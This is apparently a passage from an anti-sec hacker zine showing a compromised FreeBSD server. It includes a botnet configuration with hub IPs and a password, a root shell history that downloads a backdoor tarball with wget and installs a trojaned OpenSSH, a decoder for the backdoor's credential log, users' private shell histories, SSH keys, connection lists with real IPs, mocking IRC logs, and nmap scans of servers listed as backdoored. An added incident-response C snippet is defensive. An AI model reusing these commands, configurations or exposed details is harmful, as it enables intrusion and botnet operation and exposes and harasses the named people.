name = "#darkmindz";
|
||
tag = "secchat";
|
||
}
|
||
);
|
||
};
|
||
10 = {
|
||
items = (
|
||
{
|
||
type = "CHANNEL";
|
||
chat_type = "IRC";
|
||
name = "#astalavista";
|
||
tag = "secchat";
|
||
}
|
||
);
|
||
};
|
||
};
|
||
mainwindows = { 1 = { first_line = "1"; lines = "49"; }; };
|
||
|
||
|
||
[root@velocity:/tmp/...]# cat botnet.conf
|
||
set harryhub "hub 69.42.223.68:7100" ; # the hub ("hubnick ipadress:port")
|
||
set harryahub "otis 12.226.117.109:7100" ; # the hub ("althubnick ipadress:port")
|
||
set offlinehub 1 ; # run bot in limbomode (1/0) (VERY recomended)
|
||
set owner "shoes , rizo" ; # owner(s) ("Jmns")
|
||
set botnet_pass "xxlgertg51515150rwf0" ; # just set this to some rand string
|
||
set usemsgcmd 0 ; # Enable msg commands (1/0) (not recomended)
|
||
source harry.tcl
|
||
[root@velocity:/tmp/...]#
|
||
|
||
[root@velocity:/]# ls -la
|
||
total 129
|
||
drwxr-xr-x 22 root wheel 512 Jun 29 16:00 ./
|
||
drwxr-xr-x 22 root wheel 512 Jun 29 16:00 ../
|
||
-rw-r--r-- 2 root wheel 801 Jan 12 2007 .cshrc
|
||
drwxr-xr-x 2 root wheel 512 Jun 29 16:00 .dev/
|
||
-rw-r--r-- 2 root wheel 251 Jan 12 2007 .profile
|
||
drwxrwxr-x 2 root operator 512 Apr 12 2007 .snap/
|
||
-r--r--r-- 1 root wheel 6196 Jan 12 2007 COPYRIGHT
|
||
drwxr-xr-x 2 root wheel 1024 Apr 16 2007 bin/
|
||
drwxr-xr-x 6 root wheel 512 Apr 16 2007 boot/
|
||
drwxr-xr-x 2 root wheel 512 Apr 12 2007 cdrom/
|
||
lrwxr-xr-x 1 root wheel 10 Apr 12 2007 compat@ -> usr/compat
|
||
dr-xr-xr-x 4 root wheel 512 Dec 31 1969 dev/
|
||
drwxr-xr-x 2 root wheel 512 Apr 12 2007 dist/
|
||
-rw------- 1 root wheel 4096 Apr 16 2007 entropy
|
||
drwxr-xr-x 19 root wheel 2048 Jun 28 21:09 etc/
|
||
lrwxrwxrwx 1 root wheel 8 Apr 12 2007 home@ -> usr/home
|
||
drwxr-xr-x 2 root wheel 512 Apr 12 2007 home2/
|
||
-rw-r--r-- 1 root wheel 0 Oct 5 2007 jj.log
|
||
lrwxr-xr-x 1 root wheel 22 Apr 15 2007 kernconf@ -> /usr/src/sys/i386/conf
|
||
drwxr-xr-x 3 root wheel 1024 Nov 5 2008 lib/
|
||
drwxr-xr-x 2 root wheel 512 Apr 16 2007 libexec/
|
||
drwxr-xr-x 2 root wheel 512 Jan 12 2007 media/
|
||
drwxr-xr-x 2 root wheel 512 Jan 12 2007 mnt/
|
||
dr-xr-xr-x 2 root wheel 512 Jan 12 2007 proc/
|
||
drwxr-xr-x 2 root wheel 2560 Nov 5 2008 rescue/
|
||
drwxr-xr-x 6 root wheel 512 Jun 29 08:26 root/
|
||
drwxr-xr-x 2 root wheel 2560 Apr 16 2007 sbin/
|
||
lrwxr-xr-x 1 root wheel 11 Apr 16 2007 sys@ -> usr/src/sys
|
||
drwxrwxrwt 103 root wheel 3072 Jun 29 16:00 tmp/
|
||
drwxr-xr-x 24 root wheel 512 Jun 15 07:35 usr/
|
||
drwxr-xr-x 24 root wheel 512 Jun 15 05:05 var/
|
||
|
||
|
||
[root@velocity:/var/run]# ls -la
|
||
total 112
|
||
drwxr-xr-x 5 root wheel 512 Jun 26 21:20 ./
|
||
drwxr-xr-x 24 root wheel 512 Jun 15 05:05 ../
|
||
-rw-r--r-- 1 root wheel 0 Jun 25 11:08 a.out
|
||
-rw------- 1 root wheel 0 Jun 25 15:43 as.core
|
||
-rw------- 1 root wheel 3 Jan 27 2008 cron.pid
|
||
-rw-r--r-- 1 root wheel 4 Jan 27 2008 devd.pid
|
||
srw-rw-rw- 1 root wheel 0 Jan 27 2008 devd.pipe=
|
||
-rw-r--r-- 1 root wheel 5659 Jan 27 2008 dmesg.boot
|
||
-rw------- 1 root wheel 5 Jun 25 08:57 inetd.pid
|
||
-r--r--r-- 1 root wheel 245 Jun 23 23:21 ld-elf.so.hints
|
||
-r--r--r-- 1 root wheel 67 Jan 27 2008 ld.so.hints
|
||
srw-rw-rw- 1 root wheel 0 Jan 27 2008 log=
|
||
srw------- 1 root wheel 0 Jan 27 2008 logpriv=
|
||
drwxr-xr-x 2 bind bind 512 Jan 12 2007 named/
|
||
drwxrwx--- 2 root network 512 Jan 12 2007 ppp/
|
||
drwxr-xr-x 2 root wheel 512 Jan 27 2008 proftpd/
|
||
-rw-r--r-- 1 root wheel 4 Jan 27 2008 proftpd.pid
|
||
-rw-r--r-- 1 root wheel 14776 Jun 26 20:09 proftpd.scoreboard
|
||
-rw------- 1 root wheel 78 Jan 27 2008 sendmail.pid
|
||
-rw-rw-rw- 1 root wheel 2930 Jun 26 18:08 ssh.old // Backdoor _encrypted_ log file
|
||
-rw-r--r-- 1 root wheel 6 Jun 17 18:29 sshd.pid
|
||
-rw------- 1 root wheel 3 Jan 27 2008 syslog.pid
|
||
-rw-r--r-- 1 root wheel 0 Jan 27 2008 syslogd.sockets
|
||
-rw-r--r-- 1 root wheel 1496 Jun 26 21:31 utmp
|
||
[root@velocity:/var/run]#
|
||
|
||
[root@velocity:/var/run]# cat ssh.old
|
||
|
||
|
||
|
||
|
||
[root@velocity:/var/run]# cat lame.c
|
||
#include <stdio.h>

/* Print the bitwise complement of every byte in the named file. */
int main(int argc, char *argv[])
{
    FILE *n00bfile;
    int lamechar;   /* int, so that EOF is distinguishable from a data byte */

    if (argc < 2) {
        printf("Usage: %s filename\n", argv[0]);
        return 1;   /* without this, fopen() would be called on a NULL argv[1] */
    }
    if ((n00bfile = fopen(argv[1], "rb")) == NULL) {
        perror(argv[1]);
        return 1;
    }
    while ((lamechar = fgetc(n00bfile)) != EOF)
        putchar(~lamechar & 0xff);
    fclose(n00bfile);
    return 0;
}
|
||
|
||
// Let's try out our complex decryption program..
|
||
|
||
[root@velocity:/var/run]# gcc -o lame lame.c
|
||
[root@velocity:/var/run]# rm lame.c
|
||
[root@velocity:/var/run]# ./lame ssh.old
|
||
|
||
[root@velocity:/var/run]#
|
||
|
||
// 0wn3d by y0ur 0wn backd00r..
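The log the backdoor kept in /var/run was only byte-complemented, which is all lame.c has to undo. An added example (not part of the original zine) of the same check from the responder's side: it tells plain, complemented and binary buffers apart, then lists which accounts appear in the decoded records so their passwords can be rotated, without echoing the passwords. The HOOKIN/HOOKOUT record layout is assumed from the decoder's output; the sample records, account names and address are constructed.

```c
/* Added example: triage of a byte-complemented credential log (IR helper).
 * Assumed record layout: "HOOKIN: user:pass" and "HOOKOUT: host user:pass". */
#include <stdio.h>
#include <string.h>

enum kind { KIND_TEXT, KIND_COMPLEMENTED, KIND_BINARY };
#define MAX_IDS 64
#define ID_LEN  128

struct summary {
    enum kind kind;
    int inbound, outbound, malformed, n_ids;
    char ids[MAX_IDS][ID_LEN];  /* "user" or "user@host"; passwords are never stored */
};

/* Constructed sample records (fake accounts, documentation-range address). */
static const char SAMPLE_PLAIN[] =
    "HOOKIN: alice:not-a-real-pw\n"
    "HOOKIN: alice:not-a-real-pw\n"
    "HOOKIN: bob:example1\n"
    "HOOKOUT: 192.0.2.10 backup:example2\n"
    "HOOKOUT: 192.0.2.10 backup:example2\n"
    "truncated rec\n";

/* Share of bytes that are printable ASCII or whitespace after XOR with mask. */
static double text_ratio(const unsigned char *buf, size_t len, unsigned char mask)
{
    size_t ok = 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = buf[i] ^ mask;
        if ((c >= 0x20 && c <= 0x7e) || c == '\n' || c == '\r' || c == '\t')
            ok++;
    }
    return len ? (double)ok / (double)len : 0.0;
}

/* ~b on a byte is b ^ 0xFF, so score the buffer both raw and complemented. */
enum kind classify(const unsigned char *buf, size_t len)
{
    if (text_ratio(buf, len, 0x00) >= 0.95) return KIND_TEXT;
    if (text_ratio(buf, len, 0xFF) >= 0.95) return KIND_COMPLEMENTED;
    return KIND_BINARY;
}

static void add_unique(struct summary *s, const char *id)
{
    for (int i = 0; i < s->n_ids; i++)
        if (strcmp(s->ids[i], id) == 0) return;
    if (s->n_ids < MAX_IDS)
        snprintf(s->ids[s->n_ids++], ID_LEN, "%s", id);
}

/* Parse decoded text in place: count records, collect affected identities. */
void summarize(char *text, struct summary *s)
{
    for (char *line = strtok(text, "\r\n"); line; line = strtok(NULL, "\r\n")) {
        char host[64], user[64], id[ID_LEN];
        int end = 0;  /* set by %n only when the ':' after the user name matched */
        if (sscanf(line, "HOOKIN: %63[^: ]:%n", user, &end) == 1 && end > 0) {
            s->inbound++;
            add_unique(s, user);
            continue;
        }
        end = 0;
        if (sscanf(line, "HOOKOUT: %63s %63[^: ]:%n", host, user, &end) == 2 && end > 0) {
            s->outbound++;
            snprintf(id, sizeof id, "%s@%s", user, host);
            add_unique(s, id);
            continue;
        }
        s->malformed++;
    }
}

/* Classify buf, decode it if complemented, summarize; -1 if binary or too large. */
int triage(const unsigned char *buf, size_t len, struct summary *s)
{
    static char text[4096];
    memset(s, 0, sizeof *s);
    s->kind = classify(buf, len);
    if (s->kind == KIND_BINARY || len >= sizeof text) return -1;
    for (size_t i = 0; i < len; i++)
        text[i] = (char)(s->kind == KIND_COMPLEMENTED ? (unsigned char)~buf[i] : buf[i]);
    text[len] = '\0';
    summarize(text, s);
    return 0;
}

/* Complement the constructed sample, then run it through triage(). */
const struct summary *run_sample(void)
{
    static struct summary s;
    unsigned char raw[sizeof SAMPLE_PLAIN];
    size_t len = strlen(SAMPLE_PLAIN);
    for (size_t i = 0; i < len; i++)
        raw[i] = (unsigned char)~SAMPLE_PLAIN[i];
    triage(raw, len, &s);
    return &s;
}

int main(void)
{
    const struct summary *s = run_sample();
    printf("kind=%d inbound=%d outbound=%d malformed=%d\n",
           s->kind, s->inbound, s->outbound, s->malformed);
    for (int i = 0; i < s->n_ids; i++)
        printf("rotate credentials for: %s\n", s->ids[i]);
    return 0;
}
```

A file whose bytes are nearly all above 0x7f but turn into text when complemented is the signature to look for in world-writable or runtime directories.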
|
||
|
||
|
||
[root@velocity:~]# cat /etc/profile
|
||
# $FreeBSD: src/etc/profile,v 1.14 2004/06/06 11:46:27 schweikh Exp $
|
||
#
|
||
# System-wide .profile file for sh(1).
|
||
#
|
||
# Uncomment this to give you the default 4.2 behavior, where disk
|
||
# information is shown in K-Blocks
|
||
# BLOCKSIZE=K; export BLOCKSIZE
|
||
#
|
||
# For the setting of languages and character sets please see
|
||
# login.conf(5) and in particular the charset and lang options.
|
||
# For full locales list check /usr/share/locale/*
|
||
# You should also read the setlocale(3) man page for information
|
||
# on how to achieve more precise control of locale settings.
|
||
#
|
||
# Read system messages
|
||
# msgs -f
|
||
# Allow terminal messages
|
||
# mesg y
|
||
export PS1="[\u@\h:\w]\\$ "
|
||
alias ls='/bin/ls -GFa'
|
||
alias ll='/bin/ls -GFal'
|
||
alias lo='/bin/ls -GFalo'
|
||
export LSCOLORS=ExGxFxf5CxfgDxabagacad
|
||
export EDITOR=pico
|
||
TMOUT=1800
|
||
|
||
export HISTFILE=~/.bshrc // Bypassing backdoor HISTFILE=/dev/null
|
||
export HISTSIZE=1500
|
||
|
||
[root@velocity:~]#
|
||
|
||
// After a while...
|
||
|
||
[root@velocity:~]# cat /root/.bshrc
|
||
w
|
||
rm -rf hax
|
||
rm -rf lol.tar.gz
|
||
ls -la
|
||
exit
|
||
w
|
||
wget http://board.whois.co.kr/lol.tar.gz // See attachments section for lol.tar.gz backdoor
|
||
tar -zxf lol.tar.gz
|
||
cd hax
|
||
ls -la
|
||
ssh -v
|
||
vi version.h // OpenSSH Version editing
|
||
./quick // Installation
|
||
cd ..
|
||
ls -la
|
||
cd /home/romeo/
|
||
ls -la
|
||
cat .bash_history
|
||
ls -la
|
||
cd .irssi/
|
||
ls -la
|
||
rm -rf away.log // Too late..
|
||
cd ..
|
||
ls -la
|
||
w
|
||
ps aux | grep ssh
|
||
netstat -an | grep :22 // See the remaining 18 netstats.. not counting who and kills..
|
||
netstat -an | grep 22
|
||
netstat -an | grep ssh
|
||
netstat -a | grep 22
|
||
netstat -an | grep .22
|
||
env
|
||
netstat -an | grep 188.51.85.13
|
||
netstat -an | grep 248.22
|
||
w
|
||
netstat -anp | grep 248.22
|
||
netstat -an | grep 248.22
|
||
whois 98.242.244.25
|
||
ps aux | grep ssh
|
||
kill -9 8095
|
||
kill -9 8128
|
||
kill -9 8866
|
||
ps aux | grep ssh
|
||
kill -9 92546
|
||
kill -9 93418
|
||
w
|
||
env
|
||
netstat -an | grep 188.51.85.13
|
||
netstat -an | grep .248.22
|
||
w
|
||
ls -al
|
||
cat > w
|
||
sh x
|
||
sh w
|
||
ls -la
|
||
bas w
|
||
bash w
|
||
ls -la
|
||
cat w
|
||
netstat -tanp
|
||
ps aux | grep ssh
|
||
kill -9 43929
|
||
kill -9 75936
|
||
kill -9 75934
|
||
ps aux | grep ssh
|
||
kll -9 23783
|
||
kill -9 23783
|
||
ps aux | grep ssh
|
||
time
|
||
date
|
||
ls -la
|
||
chmod +x w
|
||
./w
|
||
ls -la
|
||
rm -f w
|
||
ps aux | grep ssh
|
||
kill -9 22353
|
||
ps aux | grep ssh
|
||
kill -9 9078
|
||
ps aux | grep ssh
|
||
env
|
||
netstat -an | grep 188.51.85.13
|
||
netstat -an | grep .248.22
|
||
csf
|
||
last | grep 98.242.244.25
|
||
lastlog
|
||
w
|
||
ls -la
|
||
netstat -anp tcp
|
||
netstat -anp tcp | grep .22
|
||
netstat -anp tcp | grep 72.20.28.226.6697
|
||
netstat -anp
|
||
netstat -anp tcp
|
||
sockstat
|
||
ps aux | grep ioplex
|
||
exit
|
||
w
|
||
cd ~pimpinjg/
|
||
ls -la
|
||
cat .bash_history
|
||
w
|
||
ls -la
|
||
cd /
|
||
ls -la
|
||
cd /tmp
|
||
ls -la
|
||
cd /var/log
|
||
ls -la
|
||
tail -f messages
|
||
cat security | grep romeo
|
||
cat security | grep root
|
||
w
|
||
cd ~romeo
|
||
ls -la
|
||
cat .bash_history
|
||
ps aux | grep romeo
|
||
ps aux | grep romeo
|
||
ps aux | grep ssh
|
||
w
|
||
ls -la
|
||
w
|
||
ls -la
|
||
ps aux
|
||
ps aux | grep irc
|
||
ping velocity.vitalspeeds.com
|
||
[root@velocity:~]#
|
||
|
||
/*
|
||
RoMe0 in panic mode.. netstat.. netstat.. netstat..
|
||
Thank you for all the fish.. n00bfish..
|
||
*/
|
||
|
||
[root@velocity:~]# cat /usr/home/pimpinjg/.bshrc
|
||
nano .bashrc
|
||
clear
|
||
ls
|
||
grep -r motd
|
||
grep -r motd *
|
||
clear
|
||
rm -rf znc*
|
||
clear
|
||
ls
|
||
clear
|
||
PS1='\033[1;32m\]\033[1;30m\][\033[1;32m\]root\[\033[1;30m\]@\[\033[1;32m\]\h\[\033[1;30m\]]:[\033[1;32m\]\w\[\033[1;30m\]]\[\033[1;30m\]\$\[\033[0m\] '
|
||
clear
|
||
uptime
|
||
ps aux
|
||
ls -al
|
||
uptime
|
||
clear
|
||
ls
|
||
nano .profile
|
||
nano .bashprompt
|
||
exit
|
||
clear
|
||
screen -r
|
||
clear
|
||
exit
|
||
clear
|
||
screen -r
|
||
screen -r
|
||
clear
|
||
exit
|
||
[root@velocity:~]#
|
||
|
||
// Advanced Linux Administration Skillz.. The 2 years of extensive training finally paid off..
|
||
|
||
|
||
[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/known_hosts
|
||
|
||
|
||
[root@velocity:~]# cat /usr/home/pimpinjg/.ssh/authorized_keys
|
||
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAn6d6bVIeir4IWs3b8F8kUfiaHKXZ+4nwuQpRMaoI67rqY8Tmjp5oFgT7CeRCIF0GUXAjY3my4T3GcV0ed+/5ilyoC0NG5W/TAvF62IQpQop9apP8HBlyiOaHuXgNVbit6/1EUW4SvLWdUe8zNqTWPw0/qZ2eQAEH8E+cbqT8LYsNWsQI9tpcJykigRZF1TqjL6vJtbQLqSgr2Gdz1+Xv9wXKlxdHSLa5ay5VuEij6w6rUS7ZI9OoOqGA2NICjs008cOy3yhCVHh1V7I50rLoPZWBZa72VBPPMvqiJpHbcIP8+NaXnIeLoINnYsV3xk27lSDT0UBBHLQ5miaLnvEzgw== pimpinjg@mercedes.pimpinjg.ch
|
||
|
||
|
||
[root@velocity:/var/run]# lsof -i -n | grep ssh
|
||
sshd 19971 root 3u IPv6 0xcc1771d0 0t0 TCP *:ssh (LISTEN)
|
||
sshd 19971 root 4u IPv4 0xc585e000 0t0 TCP *:ssh (LISTEN)
|
||
|
||
sshd 23362 root 3u IPv4 0xca6ae570 0t0 TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED)
|
||
sshd 23383 romeo 3u IPv4 0xca6ae570 0t0 TCP 72.20.28.248:ssh->188.51.85.13:57409 (ESTABLISHED)
|
||
|
||
sshd 28333 root 3u IPv4 0xc9fc4570 0t0 TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
|
||
sshd 28335 yaquis 3u IPv4 0xc9fc4570 0t0 TCP 72.20.28.206:ssh->72.223.92.235:6345 (ESTABLISHED)
|
||
sshd 30593 root 3u IPv4 0xc97b93a0 0t0 TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
|
||
sshd 30595 katsst 3u IPv4 0xc97b93a0 0t0 TCP 72.20.28.204:ssh->75.84.149.5:1294 (ESTABLISHED)
|
||
sshd 30595 katsst 10u IPv4 0xc5b901d0 0t0 TCP 72.20.3.98:63271->192.168.1.1:http (SYN_SENT)
|
||
sshd 30595 katsst 11u IPv4 0xc590eae0 0t0 TCP 72.20.3.98:60359->91.184.73.195:46464 (ESTABLISHED)
|
||
sshd 30595 katsst 12u IPv4 0xc94fc570 0t0 TCP 72.20.3.98:61645->79.66.132.125:44020 (ESTABLISHED)
|
||
sshd 30595 katsst 13u IPv4 0xc5eb2910 0t0 TCP 72.20.3.98:62162->192.168.1.1:http (SYN_SENT)
|
||
sshd 30595 katsst 14u IPv4 0xc996d000 0t0 TCP 127.0.0.1:58269->127.0.0.1:33282 (SYN_SENT)
|
||
sshd 30595 katsst 15u IPv4 0xc954e910 0t0 TCP 72.20.3.98:60168->72.185.123.4:6601 (ESTABLISHED)
|
||
sshd 30595 katsst 17u IPv4 0xc99f81d0 0t0 TCP 72.20.3.98:60170->66.245.139.243:53066 (ESTABLISHED)
|
||
sshd 30595 katsst 18u IPv4 0xca0c1570 0t0 TCP 72.20.3.98:60172->124.168.34.236:50666 (ESTABLISHED)
|
||
sshd 30595 katsst 19u IPv4 0xcaf02910 0t0 TCP 72.20.3.98:60173->130.212.54.5:28573 (ESTABLISHED)
|
||
sshd 30595 katsst 22u IPv4 0xc9dd9740 0t0 TCP 72.20.3.98:60180->173.22.219.92:64415 (ESTABLISHED)
|
||
sshd 30595 katsst 23u IPv4 0xc622c570 0t0 TCP 72.20.3.98:60178->173.54.28.183:22677 (ESTABLISHED)
|
||
sshd 30595 katsst 27u IPv4 0xca10bcb0 0t0 TCP 72.20.3.98:60183->79.101.217.199:55824 (ESTABLISHED)
|
||
sshd 30595 katsst 28u IPv4 0xcc5021d0 0t0 TCP 72.20.3.98:60188->92.72.182.81:50009 (ESTABLISHED)
|
||
sshd 30595 katsst 29u IPv4 0xcc3dd740 0t0 TCP 72.20.3.98:60189->65.26.34.13:23928 (ESTABLISHED)
|
||
sshd 30595 katsst 30u IPv4 0xc972b740 0t0 TCP 72.20.3.98:60190->87.80.43.167:49878 (ESTABLISHED)
|
||
sshd 30595 katsst 35u IPv4 0xca1413a0 0t0 TCP 72.20.3.98:60195->61.229.122.218:42282 (ESTABLISHED)
|
||
sshd 30595 katsst 38u IPv4 0xc61be910 0t0 TCP 72.20.3.98:60198->67.185.180.151:21366 (ESTABLISHED)
|
||
sshd 30595 katsst 42u IPv4 0xca1cb1d0 0t0 TCP 72.20.3.98:60202->81.246.198.243:21771 (ESTABLISHED)
|
||
sshd 30595 katsst 43u IPv4 0xc9db61d0 0t0 TCP 72.20.3.98:60203->71.228.40.165:13289 (ESTABLISHED)
|
||
sshd 30595 katsst 46u IPv4 0xc61bd3a0 0t0 TCP 72.20.3.98:60217->70.69.35.95:48486 (ESTABLISHED)
|
||
sshd 30595 katsst 49u IPv4 0xc92c6000 0t0 TCP 72.20.3.98:60224->24.245.45.179:56678 (ESTABLISHED)
|
||
sshd 30595 katsst 52u IPv4 0xcae45740 0t0 TCP 72.20.3.98:60229->66.41.52.92:26396 (ESTABLISHED)
|
||
sshd 30595 katsst 56u IPv4 0xca03d740 0t0 TCP 72.20.3.98:60258->122.167.178.174:29404 (ESTABLISHED)
|
||
sshd 30595 katsst 82u IPv4 0xc9dbacb0 0t0 TCP 72.20.3.98:60295->77.250.210.43:62003 (ESTABLISHED)
|
||
sshd 30595 katsst 85u IPv4 0xca0793a0 0t0 TCP 72.20.3.98:60311->93.97.7.183:38461 (ESTABLISHED)
|
||
sshd 30595 katsst 86u IPv4 0xc9a1c000 0t0 TCP 72.20.3.98:60307->65.33.173.202:24132 (ESTABLISHED)
|
||
sshd 30595 katsst 87u IPv4 0xc986f910 0t0 TCP 72.20.3.98:60312->74.173.228.216:61577 (ESTABLISHED)
|
||
sshd 30622 root 3u IPv4 0xc98fb000 0t0 TCP 72.20.28.205:ssh->89.30.147.8:3766 (ESTABLISHED)
|
||
sshd 30890 root 3u IPv4 0xc58eb000 0t0 TCP 72.20.28.205:ssh->89.30.147.8:3812 (ESTABLISHED)
|
||
[root@velocity:/var/run]#
|
||
|
||
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
|
||
ANTISECFORLULZ ANTISECFORLULZ
|
||
ANTISECFORLULZ [root@velocity:/]# ps -aux | grep romeo ANTISECFORLULZ
|
||
ANTISECFORLULZ root 98610 0.0 0.2 5400 2004 ?? Is 12:16PM 0:00.19 sshd: romeo [priv] (sshd) ANTISECFORLULZ
|
||
ANTISECFORLULZ romeo 98648 0.0 0.2 5384 2052 ?? S 12:16PM 0:03.21 sshd: (sshd) ANTISECFORLULZ
|
||
ANTISECFORLULZ romeo 27874 0.0 0.6 9104 6212 p0 S+ 2:21PM 0:04.59 irssi -h absolute.ownage.net ANTISECFORLULZ
|
||
ANTISECFORLULZ romeo 32521 0.0 0.1 3272 1384 p0 Is 7:40PM 0:00.05 /usr/local/bin/bash ANTISECFORLULZ
|
||
ANTISECFORLULZ romeo 27845 0.0 0.1 2040 1376 p2 S+ 2:20PM 0:00.04 screen -r ANTISECFORLULZ
|
||
ANTISECFORLULZ romeo 98652 0.0 0.2 3244 1848 p2 Is 12:16PM 0:00.03 -bash (bash) ANTISECFORLULZ
ANTISECFORLULZ root 32868 0.0 0.1 1552 872 p3 L+ 4:23PM 0:00.00 grep romeo ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ [root@velocity:/]# killall screen ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ [00:25:59] * Quits: @pimpinjg (FBI@tdirc-1243C38A.deploy.akamaitechnologies.com) (Quit: Lost terminal) ANTISECFORLULZ
ANTISECFORLULZ [00:25:59] * Quits: &RoMeO (root@DarkMindZ.com) (Quit: Lost terminal) ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ [12:29am] <~RoMeO> wtf is up with screen :@ ANTISECFORLULZ
ANTISECFORLULZ [12:29am] <+G-Brain> 23:26 -!- RoMeO [root@DarkMindZ.com] has quit [Quit: Lost terminal] ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <~RoMeO> "[screen is terminating]" with no reason ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <+G-Brain> hah ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <%p3ri0d> oh yeah ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <+G-Brain> it has a few shitty default key bindings ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <~RoMeO> ctrl+D ANTISECFORLULZ
ANTISECFORLULZ [12:30am] <~RoMeO> didnt do that ANTISECFORLULZ
ANTISECFORLULZ [12:33am] <~RoMeO> gay shit ANTISECFORLULZ
ANTISECFORLULZ [12:33am] <+G-Brain> [romeo@juliet]$ pkill -9 screen ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ

[root@velocity:/]# last | grep romeo
romeo ttyp3 188.50.84.224 Thu Jul 2 23:06 - 00:24 (01:17)
romeo ttyp0 188.50.84.224 Thu Jul 2 22:53 - 01:52 (02:58)
romeo ttyp6 188.51.85.13 Thu Jul 2 14:49 - 17:59 (03:09)
romeo ttyp5 188.51.85.13 Thu Jul 2 12:12 still logged in
romeo ttyp5 188.51.85.13 Thu Jul 2 11:02 - 11:05 (00:02)
romeo ttyp5 188.51.85.13 Wed Jul 1 20:29 - 20:29 (00:00)

[root@velocity:/]# cat ~/ssh/known_hosts
// Backdoored Servers (Makosolutions, Efnet, IRCVPS, etc..) all running OpenSSH <= 4.3

NMap Scans of all servers compromised
-------------------------------------

1. nmap -v -sV -P0 webhostline.com -p 2222

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Time
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.09s elapsed
Initiating SYN Stealth Scan at 11:28
Scanning 6696220213.hostnoc.net (66.96.220.213) [1 port]
Discovered open port 2222/tcp on 66.96.220.213
Completed SYN Stealth Scan at 11:28, 0.77s elapsed (1 total ports)
Initiating Service scan at 11:28
Scanning 1 service on 6696220213.hostnoc.net (66.96.220.213)
Completed Service scan at 11:28, 0.57s elapsed (1 service on 1 host)
NSE: Script scanning 66.96.220.213.
NSE: Script Scanning completed.
Host 6696220213.hostnoc.net (66.96.220.213) is up (0.24s latency).
Interesting ports on 6696220213.hostnoc.net (66.96.220.213):
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
Raw packets sent: 1 (44B) | Rcvd: 48 (4086B)


2. nmap -v -sV -P0 -p 22 vitalspeeds.com

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:28 GTB Daylight Time
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:28
Completed Parallel DNS resolution of 1 host. at 11:28, 0.02s elapsed
Initiating SYN Stealth Scan at 11:28
Scanning ukscene.diyhost.co.uk (66.197.170.181) [1 port]
Discovered open port 22/tcp on 66.197.170.181
Completed SYN Stealth Scan at 11:28, 0.82s elapsed (1 total ports)
Initiating Service scan at 11:28
Scanning 1 service on ukscene.diyhost.co.uk (66.197.170.181)
Completed Service scan at 11:28, 0.52s elapsed (1 service on 1 host)
NSE: Script scanning 66.197.170.181.
NSE: Script Scanning completed.
Host ukscene.diyhost.co.uk (66.197.170.181) is up (0.25s latency).
Interesting ports on ukscene.diyhost.co.uk (66.197.170.181):
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.14 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)

3. nmap -v -sV -P0 -p 22 stardustdawn.com

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Time
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 11:29
Completed Parallel DNS resolution of 1 host. at 11:29, 0.69s elapsed
Initiating SYN Stealth Scan at 11:29
Scanning mx101.stardustdawn.com (64.191.69.101) [1 port]
Discovered open port 22/tcp on 64.191.69.101
Completed SYN Stealth Scan at 11:29, 0.80s elapsed (1 total ports)
Initiating Service scan at 11:29
Scanning 1 service on mx101.stardustdawn.com (64.191.69.101)
Completed Service scan at 11:29, 0.60s elapsed (1 service on 1 host)
NSE: Script scanning 64.191.69.101.
NSE: Script Scanning completed.
Host mx101.stardustdawn.com (64.191.69.101) is up (0.24s latency).
Interesting ports on mx101.stardustdawn.com (64.191.69.101):
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.90 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)


4. nmap -v -sV -P0 -p 2022 irc.indoirc.net

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 11:29 GTB Daylight Time
NSE: Loaded 3 scripts for scanning.
Warning: Hostname irc.indoirc.net resolves to 2 IPs. Using 70.34.192.50.
Initiating Parallel DNS resolution of 1 host. at 11:29
Completed Parallel DNS resolution of 1 host. at 11:29, 0.01s elapsed
Initiating SYN Stealth Scan at 11:29
Scanning ip-70-34-192-50.razorservers.com (70.34.192.50) [1 port]
Discovered open port 2022/tcp on 70.34.192.50
Completed SYN Stealth Scan at 11:29, 0.82s elapsed (1 total ports)
Initiating Service scan at 11:29
Scanning 1 service on ip-70-34-192-50.razorservers.com (70.34.192.50)
Completed Service scan at 11:29, 0.55s elapsed (1 service on 1 host)
NSE: Script scanning 70.34.192.50.
